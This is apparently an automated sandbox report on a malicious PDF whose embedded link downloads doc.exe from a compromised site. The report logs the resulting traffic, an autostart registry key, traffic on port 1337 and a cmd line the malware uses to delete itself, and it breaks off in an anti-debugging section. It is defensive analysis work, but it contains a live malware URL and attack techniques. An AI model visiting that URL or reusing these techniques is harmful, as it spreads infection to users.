
Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:491829
Start time:21:31:26
Joe Sandbox Product:Cloud
Start date:03.02.2018
Overall analysis duration:0h 7m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:aaa.pdf
Cookbook file name:defaultwindowspdfcookbook.jbs
Analysis system description:Windows 10 (Java 1.8.0_91, Flash 21.0.0.242, Acrobat Reader DC 2015.016.20039, Internet Explorer 11, Chrome 51, Firefox 47)
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal88.evad.expl.spyw.troj.winPDF@22/41@5/4
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 24
  • Number of non-executed functions: 48
EGA Information:Failed
HDC Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .pdf
  • Found PDF document
  • Simulate clicks
  • Security Warning found
  • Click Allow
  • Close Viewer
  • URL browsing timeout
Warnings:
  • Exclude process from analysis (whitelisted): WmiPrvSE.exe, rundll32.exe, WmiApSrv.exe
  • Execution Graph export aborted for target RdrCEF.exe, PID 3644 because it is empty
  • Execution Graph export aborted for target iexplore.exe, PID 876 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: doc.exe, doc.exe


Detection

Strategy: Threshold
Score: 88
Range: 0 - 100
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Signature Overview



AV Detection:

Antivirus detection for submitted file
Source: aaa.pdf | virustotal: Detection: 8%

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: zwangerschapsyogaamsterdamwest.nl
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.1.72:49751 -> 192.185.103.35:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.1.72:49751 -> 192.185.103.35:80
Browser exploit detected (process start blacklist hit)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe

Networking:

Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /wp-user/doc.exe HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: zwangerschapsyogaamsterdamwest.nl
  Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: zwangerschapsyogaamsterdamwest.nl
Urls found in memory or binary data
Source: iexplore.exe | String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/IE/W8M6OQAW/doc
Source: AcroRd32.exe | String found in binary or memory: http://
Source: AcroRd32.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: iexplore.exe | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl
Source: AcroRd32.exe | String found in binary or memory: http://n
Source: iexplore.exe | String found in binary or memory: http://ocsp.digicert.com
Source: AcroRd32.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: AcroRd32.exe | String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: AcroRd32.exe | String found in binary or memory: http://s.symcd.com0_
Source: AcroRd32.exe | String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: AcroRd32.exe | String found in binary or memory: http://sw.symcd.com0
Source: AcroRd32.exe | String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: AcroRd32.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: AcroRd32.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: AcroRd32.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: AcroRd32.exe | String found in binary or memory: http://www.adobe.c
Source: AcroRd32.exe | String found in binary or memory: http://www.osmf.org/default/1.0%http://www.osmf.org/mediatype/default
Source: AcroRd32.exe | String found in binary or memory: http://www.osmf.org/drm/default
Source: AcroRd32.exe | String found in binary or memory: http://www.osmf.org/elementId%http://www.osmf.org/temporal/embedded$http://www.osmf.org/temporal/dyn
Source: AcroRd32.exe | String found in binary or memory: http://www.osmf.org/layout/anchor
Source: AcroRd32.exe | String found in binary or memory: http://www.osmf.org/layout/padding%http://www.osmf.org/layout/attributes
Source: AcroRd32.exe | String found in binary or memory: http://www.osmf.org/region/target#http://www.osmf.org/layout/renderer#http://www.osmf.org/layout/abs
Source: AcroRd32.exe | String found in binary or memory: http://www.osmf.org/subclip/1.0
Source: AcroRd32.exe | String found in binary or memory: http://www.quicktime.com.Acrobat
Source: iexplore.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc
Source: iexplore.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe)
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe9
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe?
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeC:
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeT8
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeWesternY
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe_
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exedv
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeeDNS
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exei
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exel
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exel(9
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exell9
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exet
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exex93$
Source: AcroRd32.exe | String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exey
Source: AcroRd32.exe | String found in binary or memory: https://
Source: AcroRd32.exe | String found in binary or memory: https://d.symcb.com/cps0%
Source: AcroRd32.exe | String found in binary or memory: https://d.symcb.com/rpa0
Source: AcroRd32.exe | String found in binary or memory: https://d.symcb.com/rpa0)
Source: AcroRd32.exe | String found in binary or memory: https://ims-na1.adobelogin.com
Source: iexplore.exe | String found in binary or memory: https://login.live.com
Source: iexplore.exe | String found in binary or memory: https://login.live.com/
Downloads executable code via HTTP
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
  Server: nginx/1.12.2
  Date: Sat, 03 Feb 2018 20:33:25 GMT
  Content-Type: application/x-msdownload
  Content-Length: 345600
  Connection: keep-alive
  Last-Modified: Thu, 01 Feb 2018 12:35:29 GMT
  Accept-Ranges: bytes
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 68 3a 72 5a 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3e 05 00 00 06 00 00 00 00 00 00 be 5d 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 5d 05 00 4b
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.72:49756 -> 213.183.58.7:1337
Uses ping.exe to check the status of other devices and networks
Source: unknown | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2022239 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.1.72:49751 -> 192.185.103.35:80
Source: Traffic | Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.1.72:49751 -> 192.185.103.35:80

Boot Survival:

Creates an autostart registry key
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run flurant
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run flurant

Stealing of Sensitive Information:

Uploads sensitive system information to the internet (privacy leak)
Source: 192.168.1.72:49751 -> 192.185.103.35:80 | HTTP traffic detected: Header contains sensitive information user (username): GET /wp-user/doc.exe HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: zwangerschapsyogaamsterdamwest.nl
  Connection: Keep-Alive

Spreading:

Enumerates the file system
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\

System Summary:

Found GUI installer (many successful clicks)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Automated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exe | Automated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exe | Automated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exe | Automated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exe | Automated click: Run
Uses Rich Edit Controls
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | File opened: C:\Windows\SYSTEM32\Msftedit.dll
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Uses new MSVCR Dlls
Source: C:\Program Files\Internet Explorer\iexplore.exe | File opened: C:\Program Files\Java\jre1.8.0_91\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: ProgID = s 'AcroExch.PDBookmark.1' source: AcroRd32.exe
Source: Binary string: VersionIndependentProgID = s 'AcroExch.PDBookmark' source: AcroRd32.exe
Source: Binary string: AcroExch.PDBookmark.1 = s 'AcroExch.PDBookmark' source: AcroRd32.exe
Source: Binary string: AcroExch.PDBookmark = s 'AcroExch.PDBookmark' source: AcroRd32.exe
Source: Binary string: CurVer = s 'AcroExch.PDBookmark.1' source: AcroRd32.exe
Source: Binary string: ForceRemove {2EAF0840-690A-101B-9CA8-9240CE2738AE} = s 'AcroExch.PDBookmark' source: AcroRd32.exe
PDF has a JavaScript or JS counter value indicative for goodware
Source: aaa.pdf | Initial sample: PDF keyword /JS count = 0
Source: aaa.pdf | Initial sample: PDF keyword /JavaScript count = 0
PDF has an EmbeddedFile counter value indicative for goodware
Source: aaa.pdf | Initial sample: PDF keyword /EmbeddedFile count = 0
Classification label
Source: classification engine | Classification label: mal88.evad.expl.spyw.troj.winPDF@22/41@5/4
Clickable URLs found in PDF
Source: aaa.pdf | Initial sample: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Creates files inside the user directory
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | File created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
Creates temporary files
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | File created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9Rtpgc30_1jawsca_2cc.tmp
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\08391ef300403b9fead968af65ee6853\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\08391ef300403b9fead968af65ee6853\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Reads ini files
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | File read: C:\Program Files\desktop.ini
Reads software policies
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)
Source: aaa.pdf | Virustotal: hash found
Spawns processes
Source: unknown | Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\aaa.pdf'
Source: unknown | Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\aaa.pdf'
Source: unknown | Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16448250
Source: unknown | Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.0.1828675925\933854480' --allow-no-sandbox-job --font-cache-shared-handle=1260 /prefetch:673131151
Source: unknown | Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.1.1650676039\414440677' --allow-no-sandbox-job --font-cache-shared-handle=1756 /prefetch:673131151
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:920 CREDAT:82945 /prefetch:2
Source: unknown | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\doc\doc.exe 'C:\Users\user\AppData\Local\Temp\doc\doc.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\aaa.pdf'
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16448250
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.0.1828675925\933854480' --allow-no-sandbox-job --font-cache-shared-handle=1260 /prefetch:673131151
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.1.1650676039\414440677' --allow-no-sandbox-job --font-cache-shared-handle=1756 /prefetch:673131151
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:920 CREDAT:82945 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Process created: C:\Users\user\AppData\Local\Temp\doc\doc.exe 'C:\Users\user\AppData\Local\Temp\doc\doc.exe'
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Uses an in-process (OLE) Automation server
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
Writes ini files
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | File written: C:\Windows\assembly\Desktop.ini
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | File created: C:\Windows\assembly\Desktop.ini
Creates mutexes
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Mutant created: \Sessions\1\BaseNamedObjects\27debcab-f106-478b-9b30-c709f1afc06a
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Detected potential crypto function
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10EC62
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10D307
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C113DF2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10C527
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10DA27
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10E127
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C115F11
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C115BE7
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10D63B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10E44D
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C119FB2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C11B27D
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C116B46
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C111EE6
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10B047
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C113082
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C1192A7
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10E9E6
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C11B98D
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C119C86
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C112158
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C119525
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10B379
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10AB8B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C142C60
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10C84B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C113AC6
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C1154C5
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C116DC2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C1157FB
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C1132FB
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C11B007
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C1105F2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C10DD4B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C11B667
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Code function: 5_2_3C1102C6
Clickable URLs found in PDF pointing to bad files
Source: aaa.pdf | Initial sample: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: AcroRd32.exe | Binary or memory string: ProgmanH
Source: AcroRd32.exe | Binary or memory string: Shell_TrayWndQ
Source: AcroRd32.exe | Binary or memory string: Progman
Source: AcroRd32.exe | Binary or memory string: Program ManagerK
Source: AcroRd32.exe | Binary or memory string: Shell_TrayWnd

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging
